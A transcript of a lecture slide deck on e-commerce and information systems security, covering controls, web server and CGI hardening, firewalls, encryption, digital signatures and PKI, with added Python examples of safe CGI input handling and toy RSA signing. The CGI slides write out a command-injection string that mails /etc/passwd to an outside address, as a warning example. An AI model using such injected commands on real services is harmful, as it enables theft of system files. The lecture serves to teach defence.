Information Systems – Security Issues / Electronic Commerce - Security (ArmyinKashmir site hijacked...)
Posted 18-Dec-2015, Category: Documents
Transcript of the slide deck:
Information Systems – Security Issues
• Electronic Commerce - Security
ArmyinKashmir site hijacked by ISI
Anti-Nuke Hackers break into BARC computers
National Informatics Center -- a treasure trove of Govt. India Information, site compromised
• All these stories have been on the front pages of major newspapers.
• If the Internet is so insecure, how can we put our corporate information on the Internet?
• For commerce to thrive on the Internet, the trust of both clients and vendors is required.
• In real-life commerce both parties can be sure of each other's identities; the web is made of anonymous, unknown, geographically distributed people.
• Unfortunately, the causes of failure are lack of awareness, lax application, and misconceptions.
Prof. Bharat Bhasker, Indian Institute of Management Lucknow
THREATS TO INFORMATION SYSTEMS
• HARDWARE FAILURE, SOFTWARE FAILURE, ELECTRICAL PROBLEMS
• COMMUNICATIONS PROBLEMS
• PERSONNEL AND ORGANISATIONAL ACTIONS
  – SECURITY BREACHES
    • ACCESS PENETRATION, PROGRAM CHANGES
    • THEFT OF DATA, SERVICES, EQUIPMENT
  – USER ERRORS
• FIRE AND OTHER NATURAL DISASTERS
Causes of Threats
• USER: Identification, Authentication, Subtle Software Modification
• PROGRAMMER: Disables Protective Features; Reveals Protective Measures
• MAINTENANCE STAFF: Disables Hardware Devices; Uses Stand-alone Utilities
• OPERATOR: Doesn’t Notify Supervisor, Reveals Protective Measures
SYSTEM QUALITY PROBLEMS
• SOFTWARE & DATA
  • BUGS: Program Code Defects or Errors
  • MAINTENANCE: Modifying a System in Production Use; Can take up to 85% of Analysts' Time
• DATA QUALITY PROBLEMS: Finding, Correcting Errors; Costly; Tedious
  – FBI found 54.1% of the records to be inaccurate
DISASTER
• LOSS OF HARDWARE, SOFTWARE, DATA BY FIRE, POWER FAILURE, FLOOD OR OTHER CALAMITY
  – Disaster recovery provided by back-up facilities for Mastercard, Visa, almost all banks and financial institutions
• FAULT-TOLERANT COMPUTER SYSTEMS: BACKUP SYSTEMS TO PREVENT SYSTEM FAILURE (Particularly On-line Transaction Processing)
  – duplication of hardware and software
CREATING A CONTROL ENVIRONMENT
• CONTROLS: Methods, Policies, Procedures to Protect Assets; Accuracy & Reliability of Records; Adherence to Management Standards
  – GENERAL
  – APPLICATION
GENERAL CONTROLS
• SOFTWARE
• HARDWARE
• COMPUTER OPERATIONS
• DATA SECURITY
• ADMINISTRATIVE: Ensure Controls Properly Executed, Enforced
• IMPLEMENTATION: Audit System Development to Assure Proper Control, Management
APPLICATION CONTROLS
• INPUT
• PROCESSING
• OUTPUT
INPUT CONTROLS
• INPUT AUTHORIZATION: Record, Monitor Source Documents
• DATA CONVERSION: Transcribe Data Properly from one Form to Another
• BATCH CONTROL TOTALS: Count Transactions Prior to and After Processing
• EDIT CHECKS: Verify Input Data, Correct Errors
PROCESSING CONTROLS
• ESTABLISH THAT DATA IS COMPLETE, ACCURATE DURING PROCESSING
• RUN CONTROL TOTALS: Generate Control Totals Before & After Processing
• COMPUTER MATCHING: Match Input Data to Master Files
OUTPUT CONTROLS
• ESTABLISH THAT RESULTS ARE ACCURATE, COMPLETE, PROPERLY DISTRIBUTED
• BALANCE INPUT, PROCESSING, OUTPUT TOTALS
• REVIEW PROCESSING LOGS
• ENSURE ONLY AUTHORIZED RECIPIENTS GET RESULTS
DEVELOPING A CONTROL STRUCTURE
• COSTS: Can be Expensive to Build; Complicated to Use
• BENEFITS: Reduces Expensive Errors, Loss of Time, Resources, Good Will
• RISK ASSESSMENT: Determine Frequency of Occurrence of Problem, Cost, Damage if it Were to Occur
MIS AUDIT
• IDENTIFIES CONTROLS OF INFORMATION SYSTEMS, ASSESSES THEIR EFFECTIVENESS
• TRACE FLOW OF SAMPLE TRANSACTIONS; NOTE HOW CONTROLS WORK
• LIST, RANK WEAKNESSES
• ESTIMATE PROBABILITIES, IMPACT
• REPORT TO MANAGEMENT
Transaction Security
• Electronic Commerce - Security
• Securing Internet commerce is akin to securing your business secrets and activities in real life
• Security concerns have to be addressed at three levels
  – Security of the Host (where the business is hosted)
  – Security of the Server providing the service (HTTP/Web Server)
  – Communication Environment
    • Network Environment
    • Transaction Security
Electronic Commerce - Host Security
• Site Security Handbook - RFC 1244 details how to secure a host computer from break-in
• Seven Critical Principles
  – Parsimony (simplest possible)
    • Remove services that are not required (HTTP, SMTP, POP3, IMAP, ...)
    • Remove all things from the host that are not required: compilers, NFS daemons, interpreters, shells
  – Superuser (Root) privileges
  – Access Control (authentication, privilege system)
  – Accountability (securely log actions for IDs)
  – Audit & Auditability (any change anywhere in the system)
    • COPS, TAMU, TripWire
  – Notification (CERT, CIAC, alarm systems)
  – Recovery (it may happen; how do you cope on the morning after?)
Electronic Commerce - Web Server Security
• Each HTTP Server has 4 configuration files
  – Access.conf: Access Control
  – httpd.conf: Server Configuration
  – mime.types: File extensions and their meanings
  – srm.conf: Options including directories and Users
• Define in httpd.conf: ServerRoot /var/httpd/
• Define in srm.conf: DocumentRoot /var/httpdocs
[Figure: directory tree showing Root, ServerRoot and DocumentRoot]
Electronic Commerce - Web Server Security
• AUTHENTICATION BASED Service
• Define in Access.conf
  – AuthUserFile /var/httpd/user ==> the file is a shorter version of /etc/passwd
    » Content --- groucho:Ygk871woj
  – AuthGroupFile /var/httpd/group
    » TeamA: mjr rubi groucho
  – AccessFileName .accessfile (generally .htaccess)
    » Per-directory controls; one can even download the .accessfile
  – Allow and deny certain Host names (wildcards), IP addresses
  – Host names are susceptible to DNS spoofing
  – Server Side Includes => allowing Execs will have security issues similar to CGI. Any passed string parameters can be exploited.
Electronic Commerce - CGI Security
• Three ways to break into a Web Server
  – Host security fails; some other service that runs on the same server fails
  – Hyper Text Transfer Protocol -- clever messages to exploit bugs, e.g., opening ../..? in Microsoft IIS crashed the server (Denial of Service attack)
  – Exploiting the weakness in CGI programs
• A closer look at the CGI program - variables set and stdin
  – SERVER_SOFTWARE
  – SERVER_PROTOCOL
  – SERVER_PORT
  – REQUEST_METHOD
  – PATH_INFO
  – QUERY_STRING
  – REMOTE_HOST
  – REMOTE_ADDR
  – CONTENT_TYPE
  – HTTP_ACCEPT
  – HTTP_REFERER
Electronic Commerce - CGI Security
• Many of these variables can be spoofed; the CGI program has to be careful. The data of the GET method comes in QUERY_STRING, and the user can pass anything in the form fields. The same is the case with PUT, except that the data is read from stdin.
• A simple CGI to search for a string in a file can be written as
  – system("/usr/bin/grep $string /usr/local/database/file")
  – What if the user passes
    • alpha beta; /bin/mail [email protected] </etc/passwd; more commands;
• ANY CGI or SSI will suffer from this drawback.
  – If (HTTP_REFERER) { Give credit to the site }
  – User passes HTTP_REFERER as /bin/mail [email protected] </etc/passwd
• Sanitize anything you get from the CGI user
  – $CLEAN_INPUT = `unescape $DIRTY_INPUT`
  – Restrict access to CGI; place it all in one directory (you can scan it for errors)
  – Use SafeCGI-like utilities
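The grep CGI from the slides, as an added Python example (not from the lecture): the unsafe string-built shell command beside a whitelisted, argv-based version that never goes through a shell. The database path and the test input are constructed stand-ins; the malicious string is the one quoted on the slide.

```python
import re
import subprocess
from typing import List

# Constructed stand-in for the slide's database file path.
DATABASE_FILE = "/usr/local/database/file"

# The form value from the slide, reproduced as a constructed test input.
INJECTED = "alpha beta; /bin/mail [email protected] </etc/passwd; more commands;"

def unsafe_shell_command(query: str) -> str:
    """The slide's one-liner: the user string is pasted into a shell command,
    so a ';' in it ends grep and starts whatever the user appended."""
    return f"/usr/bin/grep {query} {DATABASE_FILE}"

def commands_seen_by_shell(command: str) -> List[str]:
    """Rough view of how /bin/sh splits the line on ';' into separate commands
    (ignores quoting; enough to show the extra commands riding along)."""
    return [part.strip() for part in command.split(";") if part.strip()]

# Whitelist: letters, digits, space and a few punctuation marks; no shell metacharacters.
SAFE_QUERY = re.compile(r"[A-Za-z0-9_. -]{1,64}")

def is_safe_query(query: str) -> bool:
    """Whitelist check, the 'sanitize anything you get from the CGI user' step.
    Rejecting outright is safer than trying to strip characters such as ; | ` < >."""
    return SAFE_QUERY.fullmatch(query) is not None

def safe_argv(query: str) -> List[str]:
    """Pass the pattern as its own argv element and never go through a shell.
    '-F' treats it as a fixed string; '--' stops a leading '-' being read as an option."""
    if not is_safe_query(query):
        raise ValueError("query contains characters outside the allowed set")
    return ["/usr/bin/grep", "-F", "--", query, DATABASE_FILE]

def search(query: str, path: str = DATABASE_FILE) -> List[str]:
    """Runs grep with shell=False; exit status 1 just means no match."""
    argv = safe_argv(query)[:-1] + [path]
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    if result.returncode not in (0, 1):
        raise RuntimeError(result.stderr.strip())
    return result.stdout.splitlines()
```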
Electronic Commerce - Secure the Fort (Firewalls)
• Digging a deep moat around your palace
• The design forced everyone entering or leaving the palace to pass through a single drawbridge.
• Companies can have several LANs, but the connection to the outside world is restricted to a limited number of doorways, called Firewalls
• Firewalls have two components
  – Two routers
  – Application gateways
• The route to the outside world exists only through this passageway.
• The first router is used for incoming packet filtering
• The second, internal router for outgoing packet filtering, along with the application gateway, acts as additional screening for the limited offered services
[Figure slides: Electronic Commerce - Secure the Fort (Firewalls)]
Electronic Commerce - Transaction Security• E-commerce transaction security problems are of four types
  – Secrecy
  – Authentication
    • Ability to identify whom you are talking to before revealing business secrets or entering into a business deal
  – Non-repudiation
    • How do you prove that the electronic order was placed for 500 cards at Rs5.00 each, when later on the party denies placing it or claims a lower price? It deals with those "signed deals".
    • How can you be sure, before scheduling production of a custom order, that it was not a trick by a malicious adversary?
  – Integrity control
• In real life we deal with these issues too. Secrecy and integrity using registered mail, locking the documents up
• Original documents address non-repudiation, and authentication is addressed by recognizing faces, voices, signatures, etc.
Symmetric Encryption Example
[Figure: Alice encrypts the plaintext with the shared key and sends the ciphertext; Bob decrypts it with the same key and recovers the plaintext.]
Plaintext: "Dear Bob: How about coming over to my place at 1:30? If Ted ever finds out we are meeting like this it could be disastrous. Love, Alice"
Symmetric Encryption Issues
• Key (shared secret) vulnerable to discovery
• Need to share a unique secret key with each party that you wish to securely communicate with
  – Key management becomes unmanageable
Asymmetric Encryption
• Two mathematically related keys
  – Unable to derive one from the other
  – Encrypt with one, decrypt with the other
• Public Key Cryptography
  – One (public) key published for all to see
  – Other (private) key kept secret
• Algorithms
  – RSA - Integer Factorization (large primes)
  – Diffie-Hellman - Discrete Logarithms
  – ECES - Elliptic Curve Discrete Logarithm
Asymmetric Encryption Example
[Figure: Ted encrypts the message with Carol's public key; only Carol's private key decrypts the ciphertext.]
Plaintext: "Dear Carol: I think Alice is having an affair with Bob. I need to see you right away. Love, Ted"
Asymmetric Advantages
• No shared secret key
• Public key is public
  – Can be freely distributed or published
  – Key management is much easier
• Private key known ONLY to owner
  – Less vulnerable, easier to keep secret
• Supports Non-repudiation
  – Sender cannot deny sending message
Electronic Commerce - Integrity
Message Digest - Public Key System
• If secrecy of the document is not the issue, A sends P, Da(MD(P)).
• Trudy intercepts and modifies P to P'; B uses Eb(MD(P)) to get MD(P), computes MD(P'), and the two values won't match.
[Figure: Alice sends the Bank P, Da(MD(P))]
Asymmetric Non-Repudiation
[Figure: Carol encrypts the message with her own private key; Ted decrypts the ciphertext with Carol's public key, which shows it came from Carol.]
Plaintext: "Dear Ted: Please leave me alone or I will contact a lawyer. I do not care about your personal life. Carol"
Non-repudiation
• Since only the sender knows their private key, only the sender could have sent the message.
• Authentication mechanism
• Basis for Digital Signature
Asymmetric Issues
• More computationally intensive
  – 100x symmetric encryption
• Generally not used to encrypt data
  – Encrypt symmetric key (S/MIME)
  – SSL session key
S/MIME Encryption
[Figure: the message is encrypted with a symmetric key, and that key is encrypted with Carol's public key; Carol decrypts the symmetric key with her private key and then decrypts the message with it.]
Plaintext: "Dear Carol: Please do not push me away. I love you more than I do Alice. Love, Ted"
Digital Signature
• Type of Electronic Signature
• Combines one-way secure hash functions with public key cryptography
  – Hash function generates a fixed-length value
  – No two documents produce the same hash value
  – Secure Hash Algorithm 1 (SHA-1)
• Characteristics
  – Data Integrity - hash value
  – Non-repudiation – encrypted with private key
  – Does NOT provide confidentiality
Digital Signature Creation
[Figure: the document is run through a hash function, giving the hash value 0F47CEFFAE0317DBAA567C29; Sue encrypts the hash value with her private key, giving the digital signature, which is attached to the document.]
Document: "Dear Mr. Ted: We have asked the Court to issue a restraining order against you to stay away from Carol. Sincerely, Sue Yew, Dewey, Cheatam & Howe, Law Firm"
Digital Signature Validation
[Figure: the recipient hashes the received document, decrypts the digital signature with Sue's public key to recover the sender's hash value (0F47CEFFAE0317DBAA567C29), and compares the two; the signature is valid if the two hashes match.]
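The scheme of the Message Digest slide (A sends P, Da(MD(P)); Trudy's P' fails the check) and of the Digital Signature Creation and Validation slides, as an added Python example that is not part of the lecture: a SHA-1 digest signed with a textbook RSA private key and checked with the public key. The primes, key and sample order are constructed toy values.

```python
import hashlib
from typing import Tuple

# Constructed toy parameters: two small, well-known primes so the numbers stay readable.
# Real RSA keys use primes of hundreds of digits; this is for illustration only.
P, Q = 104723, 104729
E = 65537

PublicKey = Tuple[int, int]   # (n, e)
PrivateKey = Tuple[int, int]  # (n, d)

def make_keypair() -> Tuple[PublicKey, PrivateKey]:
    """Textbook RSA: n = p*q, d = e^-1 mod (p-1)(q-1)."""
    n = P * Q
    phi = (P - 1) * (Q - 1)
    d = pow(E, -1, phi)  # modular inverse (Python 3.8+)
    return (n, E), (n, d)

def message_digest(message: bytes, n: int) -> int:
    """MD(P) from the slides: SHA-1 of the document, reduced mod n so it fits the
    toy modulus (a real scheme pads the digest to the key size instead)."""
    return int.from_bytes(hashlib.sha1(message).digest(), "big") % n

def sign(message: bytes, private_key: PrivateKey) -> int:
    """Da(MD(P)): 'encrypt' the hash value with the sender's private key."""
    n, d = private_key
    return pow(message_digest(message, n), d, n)

def verify(message: bytes, signature: int, public_key: PublicKey) -> bool:
    """Recover the hash value with the public key and compare it with a fresh MD(P).
    A tampered document (Trudy's P') or a forged signature fails the comparison."""
    n, e = public_key
    return pow(signature, e, n) == message_digest(message, n)

if __name__ == "__main__":
    pub, priv = make_keypair()
    order = b"Order: 500 cards at Rs5.00 each"  # constructed sample document
    sig = sign(order, priv)
    print(verify(order, sig, pub))                               # True
    print(verify(b"Order: 500 cards at Rs4.00 each", sig, pub))  # False
```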
Source of Public Key
• Keys can be published anywhere
• Attached as a signature to e-mail
  – Pretty Good Privacy (PGP)
[PGP 7.0.4 signature block omitted]
But
• How do you know for sure who is the owner of a public key?
Public Key Infrastructure
Public Key Infrastructure (PKI) provides the means to bind public keys to their owners and helps in the distribution of reliable public keys in large heterogeneous networks. (NIST)
The set of hardware, software, people, policies and procedures needed to create, manage, store, distribute, and revoke Public Key Certificates based on public-key cryptography. (IETF PKIX working group)
Public Key Certificates
• Digital Certificates
  – Binds a public key to its owner
  – Issued and digitally signed by a trusted third party
  – Like an electronic photo-id
• Follows the X.509 V3 standard – RFC 2459
X.509 V3 Basic Fields
• Owner's X.500 distinguished name (DN)
  – C=IN;O=GOV,OU=IIML;CN=Bharat Bhasker
• Owner's public key
• Validity period
• Issuer's X.500 distinguished name
X.509 V3 Extensions
• Location of certificate status information
• Location of Issuer's certificate
• Subject's Alternative Name
  – email address, employee ID
• Key Usage constraints
  – Only for digital signatures
  – Only for encryption
• Policy information
  – Level of trust
X.509 V3 Certificate
Version: 2 (V1=0, V2=1, V3=2)
Serial Number: 56
Signature Algorithm: sha1RSA
Issuer DN: C=IN;S=UP;O=MIT;OU=MIT CA;CN=RootCA
Validity Period: 05/02/2000 08:00:00 to 05/02/2001 08:00:00
Subject DN: C=IN;O=GOV;O=IIM;OU=IIML;CN=Bharat Bhasker
Subject Public Key: RSA, 3081 8902 8181 … 0001
Issuer UID: Usually omitted
Subject UID: Usually omitted
Extensions: Optional Extensions
Signature Algorithm: sha1RSA (same as above)
Signature: 302C 0258 AE18 7CF2 … 8D48
How a PKI Issues Certificates
[Figure: flow between Subscriber, Registration Authority (RA), CA and Repository: the subscriber presents credentials to the RA and receives a passcode; the subscriber sends the passcode and public key to the CA; the CA returns a certificate containing the key, signed by the CA, and publishes it in the repository.]
Who do you Trust?
• Everyone trusts their CA
  – Trust all certificates issued by their CA
[Figure: one CA with subscribers George, Martha and Clark]
• A single CA model does not scale well: difficult to manage across large or diverse user communities
Certification Path
[Figure: Root CA certificate (self-signed with the Root CA's private key) -> Subordinate CA certificate (certificate info signed with the Root CA's private key) -> Subscriber certificate (certificate info signed with the Subordinate CA's private key) -> text document signed with the Subscriber's private key.]